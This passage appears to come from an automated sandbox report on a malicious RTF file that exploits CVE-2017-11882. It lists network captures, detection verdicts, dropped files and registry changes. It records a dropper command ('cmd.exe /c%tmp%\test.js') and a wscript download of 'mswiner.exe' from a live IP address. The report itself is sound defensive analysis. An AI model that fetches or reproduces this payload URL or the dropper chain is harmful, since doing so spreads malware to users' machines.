526. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc9\\xea\\x95\\xf6t\\x08t\\x7f'\\x95\\x02|\\x04pb\\xce\\xeew0*id`6\\x8a1\\xdbi0/d\\xaa\\x91\\x12\\x0b\\x08\\x82\\xc0\\xfbv\\xd7p\\x14\\xb4\\x88\\x98 j\\xc0<\\xf1\\x06\\xc5:m\\xa6\\xb4\\xf2\\xf8\t\\xff\\xe3\\xaa\\x82bk\\xd7\\x17\\x8e\\x80\\xe4\\x12l\\xf40\\x87\\x17\\x17\\x1a\\x93.\\x8auz\\xc4d\t\\x9c\\xf7\\x12\\xaa=\\xf7c(\\xedm\\x1d\\xde\\xa7\\x15?\\xa9\\xf5\\x19j\\xf49\\xd0u%\\xbf\\xec\\x9f\\xd8\\xd8\\x8ctj~8h=x\\xc0\\xae\\xdc\\xa3\\xa7\\x02\\x11\\x1f\\xd9\\xe0;\\xe4\ng\\xd7\\x02\\x9cy+\\xad\\xfd\\xa2\\xe6\\x9d'p\\xb1\\xd1\\xbb\\xc2\\xf9\\xda\\xf6\\x07\\xa26\\xa6\\x93x\\xaac\\xbc%\\xc0~f\\xee\\xb1\\xfc\\xd7\\x07yt\\x89h\\xe8\\x84l\\x90q6\\x1d\\x85\\xa8\\x13\\xa4\\x1f\\xf8\\xec\\xab\\xfc\\xcd\\xeb\\x84*\\xb1\\x0b\\xd9\\xd1\\xf4\\xe9\\x12\\xf2q\\xbc\\x12\\xfe\\xf8;\\xc9\\xde\\x15v\\x01n\\x96\\x9b\\xe6\\xfc\\xf9\\xaar\\xc31\\x13\\xd3\\xd7vf\\xf9\\xc95\\x01\\xe2q#\\x19\\x98)6\\xa0\\xd8\\xd5"
527.  
528.  
529. "http_request": "winword.exe_WSASend_\\xc4\\x00n\\x00\\x083#\\x11,9\\x03\\x96e\\xc4d\\xc1\\xd4\\xce\\x10\\x9a1\\x1c\\xe5`\\xcc1\\x98\\x8d\\x0f\\xfb\\xb6\\xad\\x1c/\\x95\\x07\\xc3\\x94<+bg\\x0b\\xa1-\\xa3\\xb0\\x13\\xa5\\x9d\\x8ef\\xc4g\\xb5\\x83\\x8b\\x8e$*\\x19\\xd8yx\\xbdb\\xb9\\xfe\\x1f(y\\x1b_\\xb2\\xa9\\x9c\\xa1q\\xf7g\t\\x91\n\\xf9\\xd5\t\\xc4\\xb7\\xc4r`^bc8\\xc9\\x9268\\x04\\\\xd9\\x9d\\xd0\\x83\\x1eo b\n\\xcc\\x15\\xbbkj\\xa8x\\xe6\\x1b\\xbe\\x1a\t>~\\x13\\xff\\x0e\\x8cq\\xd8\\x05\\xcb\\x0f\\xb1\\x8c\\xe7\\x94\\x88i\\x81\\x9e\\xec\\x17\\xac\t\\x84\\x8bz\\xcd\\x99\\x9f\\xd9\\xe2!\\xf5\\xda\\xa5\\x9am\\xddxm\\x19\\xd3\\xf4\\xf4\\x97\\xb8\\xa8\\xfe\\xf8\\xa8\\x19\\x10\\x8d\\xce$\\x9d\\xe54\\xeaz\\xfd\\xd3\\xc8\\xf1\\xf3\\x98'\\x11\\xee\\x16\\xf8\\xb0\\x17/\\xf5|dl\\xc95\\x0f\\x0fn@\\x7fi\\xa4p+:hl\\x93sz\\x88\\x02\\xa9w\\xb9\\xb8\\xff\\xbe\\xe7~\\xfdnc\\xb6\\xcfp\\x8f\\x12\\x11\\xfb\\x83\\xf6z\\x84\\x04\\xf6\\xe9\\x0fo\\xf1qvyy\\xa2\\x80xc"
530.  
531.  
532. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa0\\xcd\\x7f&k\\xee\\xf8\\xb1p\\xc1\\x06\\x83\\xab\r\\xcc\\x0e\"\\xb4\\xad\\xc8\\xbfv\\xb9\\xf3\\xf3\\xf4\\xd6\\x18$\\xc0\\x9ek\\x06(|g\\x84\\xe1s|\\xb0h\\xc9\\xc1e'ix\\xa1\\xbe\\xf3\\x98;c\\xd6v\\x15y\\x10\\xdc\r$j\\xd4b\\x11\\xad\\xdf\\x8c\\x84\\x11\\x13gp\\xc6_\\x90\\x10\\x80d\\xa7\\xfe\\xd6\\xfft3\\xf8i:3\\xa8?\"mr\\xdf\\x96\\xd1g\\xfb\\xe3\\x1a\\xb7\\xcb\\xc98\\xb8\\x1ex\"\r\\xf4\\xb4\\xb7p:\\xfa\\xa1\\x97\\x15\\x18k\nu)\\xbb\\xb3*t\\xee\\xeay\\xce\\xf3\\xbc\\x94\\xa2m\\xf6\\xdbce\\xec\\xb2-eg\\xeeh\\xaf0\\xbcx\\x10\\xf4\\xd6n\\xddv)\\xe6i\\x16\\xc9rz\\xf7\\x05\\xf9\\xf2\\xea\\xb6\\xff+\\x08\\x94\\xdc\\x00-^\\xfdf\\xeei\\x04\\xd1z\\xa2 r\\xec\\x0cq<\\x90\\xee~n\\xf0yd9\\x0e\\xf2\\xb4\\xe0\\xe8d\\x0b%z\\xf2 \\x0ba\\xb6p\\x9d\\xdb\\x9a\r\\xfb\\x9a\\xb1lx\\xa3\\x8a\\xa7\\xe8^6\\xd2\\x0e\\xb9g\\x86\\xb85\\xc1\\x8b\\x98\\x9f\\x06\\xa1\\xfa\\xd4\\x9e"
533.  
534.  
535. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xce\\xe9\\\\xb1\\x06n\\xe1\\x8f\\x8ccy8\n\\xea\\xc0nq\\xf1\\xf2\\x10*v\\xee\\x12k\\xaa.\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
536.  
537.  
538. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x043)3#\\xbd\\x81\\x87\\xbd\\x9b\\x11\\xf1\\x16~\\xa09\\x90\\x8c\\xa9\\xac\\x18\\xa4j\\xbf\\xf0\\xe6c\\x14\\x9a\\x0cbq\\x8f;4\\xbf\\x0f\\xdbcj\\xc6\\xa6w\\x12\\xff5\\xf6`\\xad\\xeek$\\xae\\xe2;\\x12h\\x94\\xcc\\xe9f7\\xb5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf6\\xb5\\x0e\\xf7\\xb3\\xfb\\xe2/v\\xd2\\xb5\\xac$k\\x97\\x85\\x9a\\xd3\\xc4,x\\xa2pfe\\x16\\xb2\\x86&\\xf6l\\xa6\\xc9o\\xbe\\x94\\x8d\\x98\\xa7\\xbe\\xb3\\xe2\\xb5q"
539.  
540.  
541. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5<\\xfe\\x10\nz|\\xfe\\x04 4n6\\x0e\\x9e\\xecu\\xca\\x95\\xa9g\\xa5\\x9a\\x9f>o\\xa12\\x85\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
542.  
543.  
544. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5,\\xeel(\\xb2mm\\xb3\\x7f\\xe1\\xefz\\xc8u\\xc4\\xe3%t\\xf39\\x9fi\\xcc)8z\\x10\\xda\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
545.  
546.  
547. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9d\\x9c?\\xbba\\xd9\\xb8\\xd1\\x1e\\xa6\\xee\\xa1\\xc8\\x82\\xed\\x8esi\\xa9\\xb3\\xe6\\xb2\\xd5\\x07zn\\xfd\\xa1b\\xce\\xbb\\xd7(:\\x8d\\xdcz\\xfe\\xa7\\x1eh-b\\1\\xc1\\xdaq\\xe0\\x9ay\\x11o\\x90o\\xc5\\xa4i;%\\x7f\\xda/\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\t\\xa9\\xfa\\xc9\\xe0t\\x98w\\xee\\xa1\\xc5\\xdd\\xb8w5yy\\xd5m\\x93< \\xe9h\\x0f\\xc6l\\x8c\\x89&\\xc4\rs\\x9ao\\xbcuah\\xe5\\\\x9di\\x86\\x00\\xaa7"
548.  
549.  
550. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x98f\\xedkz\\xf8\\x0f\\xa4\\x04<\\xe1)2\\xaf\\x93\\xc7\\xb5\\x1e9\\xdd5\\x10\\x91t\\x8ay\\xee\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
551.  
552.  
553. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xac$\\x0e\\x16\\xe8\\x9d7'\\x8c\\x0b\\xe8\\xefd\\xd7w\\xfb\\xc7\\xe8\\xd4.\\x16\\xee\\x9c\ng\\x08\\xa5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
554.  
555.  
556. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5wv\\xdd\\xe0\\xb0uuy\\xf6\\xac\\xc9\\x18\\xb1\\xf8\\x9a\\xf3\\x17\\xae\\xda\\x18v\\xcd\\xae\\xa1\\x9c:\\x80\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
557.  
558.  
559.  
560.  
561. "Description": "The EQNEDT32 equation process created a child process likely indicative of CVE-2017-11882 Office exploit",
562. "Details":
563.  
564. "created_process": "cmd.exe /c%tmp%\\test.js A\\x12\\x0cC"
565.  
566.  
567.  
568.  
569. "Description": "Stack pivoting was detected when using a critical API",
570. "Details":
571.  
572. "process": "EQNEDT32.EXE:3044"
573.  
574.  
575.  
576.  
577. "Description": "Creates a hidden or system file",
578. "Details":
579.  
580. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$xObOXUJYS.doc"
581.  
582.  
583. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
584.  
585.  
586.  
587.  
588. "Description": "A wscript.exe process commonly used in script or document file downloaders initiated network activity",
589. "Details":
590.  
591. "http_request": "wscript.exe_InternetCrackUrlW_http://45.11.19.145/mswiner.exe"
592.  
593.  
594. "http_request_path": "wscript.exe_HttpOpenRequestW_/mswiner.exe"
595.  
596.  
597. "http_request": "wscript.exe_InternetCrackUrlA_http://45.11.19.145"
598.  
599.  
600.  
601.  
602. "Description": "File has been identified by 41 Antiviruses on VirusTotal as malicious",
603. "Details":
604.  
605. "MicroWorld-eScan": "Exploit.EXE-Dropper.Gen"
606.  
607.  
608. "FireEye": "Exploit.EXE-Dropper.Gen"
609.  
610.  
611. "CAT-QuickHeal": "Exp.RTF.CVE-2017-11882.L"
612.  
613.  
614. "McAfee": "Exploit-CVE2017-11882.b"
615.  
616.  
617. "K7AntiVirus": "Trojan ( 0051f3601 )"
618.  
619.  
620. "K7GW": "Trojan ( 0051f3601 )"
621.  
622.  
623. "Arcabit": "Exploit.EXE-Dropper.Gen"
624.  
625.  
626. "Baidu": "Win32.Exploit.CVE-2017-11882.t"
627.  
628.  
629. "Symantec": "Exp.CVE-2017-11882!g3"
630.  
631.  
632. "ESET-NOD32": "Win32/Exploit.CVE-2017-11882.G"
633.  
634.  
635. "TrendMicro-HouseCall": "Trojan.W97M.CVE201711882.SMAL02"
636.  
637.  
638. "Avast": "OLE:CVE-2017-11882 Expl"
639.  
640.  
641. "ClamAV": "Rtf.Exploit.CVE_2017_11882-6584355-0"
642.  
643.  
644. "Kaspersky": "HEUR:Trojan-Downloader.Script.Generic"
645.  
646.  
647. "BitDefender": "Exploit.EXE-Dropper.Gen"
648.  
649.  
650. "NANO-Antivirus": "Exploit.OleNative.CVE-2017-11882.evenbv"
651.  
652.  
653. "Tencent": "Exp.MSOffice.CVE-2017-11882.b"
654.  
655.  
656. "Ad-Aware": "Exploit.EXE-Dropper.Gen"
657.  
658.  
659. "Emsisoft": "Exploit.EXE-Dropper.Gen (B)"
660.  
661.  
662. "Comodo": "Exploit.W97M.CVE2017-11882.BH@82y96x"
663.  
664.  
665. "F-Secure": "Exploit:W97M/CVE-2017-0199.B"
666.  
667.  
668. "TrendMicro": "Trojan.W97M.CVE201711882.SMAL02"
669.  
670.  
671. "McAfee-GW-Edition": "Exploit-CVE2017-11882.b"
672.  
673.  
674. "Sophos": "Exp/201711882-A"
675.  
676.  
677. "Ikarus": "Exploit.CVE-2017-11882"
678.  
679.  
680. "Cyren": "CVE-2017-11882.A.gen!Camelot"
681.  
682.  
683. "Jiangmin": "Heur:Exploit.CVE-2017-11882.Gen"
684.  
685.  
686. "Avira": "EXP/CVE-2017-11882.Gen"
687.  
688.  
689. "Antiy-AVL": "TrojanExploit/OLE.CVE-2017-11882"
690.  
691.  
692. "Microsoft": "TrojanDownloader:JS/Nemucod.ACG"
693.  
694.  
695. "ZoneAlarm": "HEUR:Trojan-Downloader.Script.Generic"
696.  
697.  
698. "GData": "Generic.Exploit.CVE-2017-11882.A"
699.  
700.  
701. "AhnLab-V3": "OLE/Cve-2017-11882.Gen"
702.  
703.  
704. "ALYac": "Exploit.CVE-2017-11882.Gen"
705.  
706.  
707. "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
708.  
709.  
710. "Rising": "Exploit.CVE-2017-11882/SLT!1.AEE3 (CLASSIC)"
711.  
712.  
713. "Yandex": "HTML.Psyme.Gen"
714.  
715.  
716. "MAX": "malware (ai score=89)"
717.  
718.  
719. "Fortinet": "MSOffice/CVE_2018_0802.C!exploit"
720.  
721.  
722. "AVG": "OLE:CVE-2017-11882 Expl"
723.  
724.  
725. "Qihoo-360": "virus.exp.21711882.gen"
726.  
727.  
728.  
729.  
730. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
731. "Details":
732.  
733. "target": "clamav:Rtf.Exploit.CVE_2017_11882-6584355-0, sha256:f14a49bc21e63284df713b631d0bce8c5c41ba79d897d6b15720ed21af7dc0c0, type:Rich Text Format data, version 1, ANSI"
734.  
735.  
736. "dropped": "clamav:Rtf.Exploit.CVE_2017_11882-6584355-0, sha256:f14a49bc21e63284df713b631d0bce8c5c41ba79d897d6b15720ed21af7dc0c0 , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\JvxObOXUJYS.doc, type:Rich Text Format data, version 1, ANSI"
737.  
738.  
739.  
740.  
741. "Description": "The RTF file contains an object with potential exploit code",
742. "Details":
743.  
744. "cve": "Object 2 index 000011A8h contains Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or CVE-2018-0802)"
745.  
746.  
747. "cve": "Object 2 index 000033E2h contains Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or CVE-2018-0802)"
748.  
749.  
750.  
751.  
752.  
753. * Started Service:
754. "osppsvc"
755.  
756.  
757. * Mutexes:
758. "Local\\2BF388D5-6F8C-40A0-A7EE-996D005C4E14_Office15",
759. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
760. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
761. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
762. "CicLoadWinStaWinSta0",
763. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
764. "Global\\MsoShellExtRegAccess_S-1-5-21-0000000000-0000000000-0000000000-1000",
765. "Global\\552FFA80-3393-423d-8671-7BA046BB5906",
766. "Local\\ZoneAttributeCacheCounterMutex",
767. "Local\\ZonesCacheCounterMutex",
768. "Local\\ZonesLockedCacheCounterMutex",
769. "Local\\ZonesCounterMutex"
770.  
771.  
772. * Modified Files:
773. "C:\\Users\\user\\AppData\\Local\\Temp\\JvxObOXUJYS.doc",
774. "C:\\Users\\user\\AppData\\Local\\Temp\\~$xObOXUJYS.doc",
775. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Office\\15.0\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=10",
776. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF7221C9C8-DA5B-4E58-B242-205AADF71DBF.tmp",
777. "C:\\Users\\user\\AppData\\Local\\Temp\\test.js",
778. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS4B7BAF70-0B3D-40A3-AD35-729B08DF661E.tmp",
779. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\2F40DBDA.wmf",
780. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
781. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
782. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
783. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
784. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab8617.tmp",
785. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar8618.tmp",
786. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\B62E0613.wmf",
787. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
788. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of JvxObOXUJYS.asd",
789. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
790. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp",
791. "C:\\Users\\user\\AppData\\Local\\Temp\\~DF2105811FCDF6183D.TMP",
792. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
793. "C:\\Users\\user\\AppData\\Local\\Temp\\cabAFC9.tmp",
794. "C:\\Users\\user\\AppData\\Local\\Temp\\cabAFF8.tmp",
795. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB019.tmp",
796. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB029.tmp",
797. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB04A.tmp",
798. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB06A.tmp",
799. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB06B.tmp",
800. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB06C.tmp",
801. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB08D.tmp",
802. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB08C.tmp",
803. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB08E.tmp",
804. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB09F.tmp",
805. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB0FD.tmp",
806. "C:\\Users\\user\\AppData\\Local\\Temp\\cabB12E.tmp",
807. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
808.  
809.  
810. * Deleted Files:
811. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab8617.tmp",
812. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar8618.tmp",
813. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\B62E0613.wmf",
814. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
815. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
816. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of JvxObOXUJYS.asd",
817. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
818. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp",
819. "C:\\Users\\user\\AppData\\Local\\Temp\\test.js"
820.  
821.  
822. * Modified Registry Keys:
823. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\78",
824. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache",
825. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\RemoteClearDate",
826. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1",
827. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\Last",
828. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0",
829. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\FilePath",
830. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\StartDate",
831. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\EndDate",
832. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Properties",
833. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Url",
834. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\LastClean",
835. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
836. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\packager.dll,-2000",
837. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
838. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
839. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
840. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
841. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
842. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
843. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
844. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
845. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1786DAE",
846. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1786DAE\\1786DBD",
847. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
848. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Cloud Storage",
849. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ForceCacheRefresh",
850. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OnceSucceeded",
851. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
852. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
853. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT",
854. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Capabilities",
855. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ConnectMechanism",
856. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsManaged",
857. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsRemovable",
858. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceOwner",
859. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SortOrder",
860. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SupportsMultiple",
861. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\CapabilitiesMetadata",
862. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Description",
863. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Name",
864. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceId",
